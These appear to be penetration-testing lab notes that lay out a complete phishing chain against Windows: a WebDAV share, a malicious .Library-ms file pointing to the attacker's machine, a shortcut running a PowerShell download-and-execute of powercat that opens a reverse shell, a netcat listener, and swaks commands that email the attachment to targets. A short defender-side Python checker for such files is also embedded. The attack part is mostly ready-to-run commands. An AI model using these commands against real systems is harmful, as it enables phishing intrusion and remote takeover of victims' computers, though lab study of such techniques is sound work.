- If the exploit doesn't work properly, use just the IP in the url tag: `<url>http://192.168.45.173</url>`. WebDAV on Windows works best on port 80.
# Phishing Attack
```bash
# Install
pip3 install wsgidav
# create webDAV root directory
mkdir webdav
# start WsgiDAV (this command uses port 8000)
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=8000 --auth=anonymous --root /home/kali/Desktop/webdav
# If installed in a venv
/home/kali/Desktop/venv/bin/wsgidav --host=0.0.0.0 --port=8000 --auth=anonymous --root /home/kali/Desktop/webdav
# Confirm by opening http://127.0.0.1:8000 in a browser
```
![[Pasted image 20251207211234.png]]
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Create in VS Code or Notepad as 'config.Library-ms' -->
<!-- Make the IP address point to my Kali -->
<!-- Save the file and transfer it to /home/kali/Desktop -->
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <!-- point to our WebDAV share over HTTP -->
        <url>http://192.168.119.5</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
```
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Prepare the Windows Library and shortcut files with VS Code (Notepad also works) -->
<!-- Create a test file named 'config.Library-ms' -->
<!-- Make the IP address point to my Kali -->
<!-- Save the file and transfer it to /home/kali/Desktop -->
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <!-- point to our WebDAV share over HTTP -->
        <url>http://192.168.45.173:8000</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
```
Save and close the file in VS Code, then double-click the `config.Library-ms` file on the Desktop. We see the `test.txt` file we had created.
![[Pasted image 20251207212049.png]]
When we re-open the file in VS Code, we find that a new tag named `serialized` has appeared. The tag contains base64-encoded information about the location in the `url` tag.
Additionally, the content inside the `url` tags has changed from `http://192.168.45.173:8000` to `\\192.168.45.173@8000\DavWWWRoot`.
Because of the encoded information in the *serialized* tag, the file may not work on other machines or after a restart. To avoid running into any issues when performing this attack, we can reset the file to its original state by pasting the contents of the code into VS Code.
![[Pasted image 20251207212216.png]]
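A defender-side triage check for the file format described above, as an added example that is not part of the original notes: it parses a `.Library-ms` attachment, flags search connectors whose `url` points at a remote HTTP or WebDAV UNC location, and reports whether a `serialized` tag is present. The sample documents, the `knownfolder:` location, and the names `triage_library_ms` and `sample_doc` are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}
# Remote forms shown in these notes: an http(s) URL, or the UNC form
# \\host@port\DavWWWRoot that Windows writes back after the file is opened.
REMOTE = re.compile(r"^(?:https?://|\\\\)(?P<host>[^/\\:@]+)", re.IGNORECASE)

def triage_library_ms(xml_text):
    """Flag remote search-connector locations in a .Library-ms document."""
    # stdlib parser for the demo; use a hardened parser (e.g. defusedxml)
    # when handling untrusted attachments at scale.
    root = ET.fromstring(xml_text.strip())
    remote = []
    for url_el in root.iterfind(".//lib:simpleLocation/lib:url", NS):
        url = (url_el.text or "").strip()
        m = REMOTE.match(url)
        if m:
            # host is what you correlate with proxy / mail-gateway logs
            remote.append({"url": url, "host": m.group("host")})
    return {
        "remote_locations": remote,
        "has_serialized": root.find(".//lib:serialized", NS) is not None,
        "suspicious": bool(remote),
    }

def sample_doc(location_xml):
    # Constructed minimal library document wrapping one <simpleLocation>.
    return ('<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
            "<searchConnectorDescriptionList><searchConnectorDescription>"
            "<simpleLocation>" + location_xml + "</simpleLocation>"
            "</searchConnectorDescription></searchConnectorDescriptionList>"
            "</libraryDescription>")

# Constructed samples: as written, after being opened once, and a local library.
FRESH = sample_doc("<url>http://192.168.45.173:8000</url>")
OPENED = sample_doc(r"<url>\\192.168.45.173@8000\DavWWWRoot</url>"
                    "<serialized>Q09OU1RSVUNURUQ=</serialized>")
LOCAL = sample_doc("<url>knownfolder:{00000000-0000-0000-0000-000000000000}</url>")

if __name__ == "__main__":
    for name, doc in (("fresh", FRESH), ("opened", OPENED), ("local", LOCAL)):
        print(name, triage_library_ms(doc))
```

A library file arriving by email or sitting on a file share with any remote location is worth quarantining for review, since legitimate user libraries normally reference local or known folders.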
##### Now create a shortcut file
- Create the shortcut file
- Right-click on the Desktop and select `New` > `Shortcut`. (Windows)
- A victim double-clicking the shortcut file will download `PowerCat` and create a reverse shell.
![[Pasted image 20251207212839.png]]
- Instead of using a Python3 web server to serve `Powercat`, we could also host it on the `WebDAV` share. However, as our WebDAV share is writable, AV and other security solutions could remove or quarantine our payload.
```bash
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173:8080/powercat.ps1'); powercat -c 192.168.45.173 -p 4444 -e powershell"
# Once we enter the command, with `install` as the shortcut file name, we can transfer the resulting shortcut file to our Kali machine into the WebDAV directory.
# Next step is to serve PowerCat via a Python3 web server.
cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
# The port must match the download URL in the shortcut command (8080); 8000 is already used by WsgiDAV
python3 -m http.server 8080
# Set up a netcat listener
rlwrap nc -lvnp 4444
# Create the email with swaks
# Create the body of the email containing our pretext.
sudo swaks --to [email protected] --to [email protected] --from [email protected] --attach @config.Library-ms --server $IP --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
```
##### Transfer *automatic_configuration.lnk* and *config.Library-ms*
```bash
cd webdav
smbclient //192.168.245.194/share -c 'put config.Library-ms'
```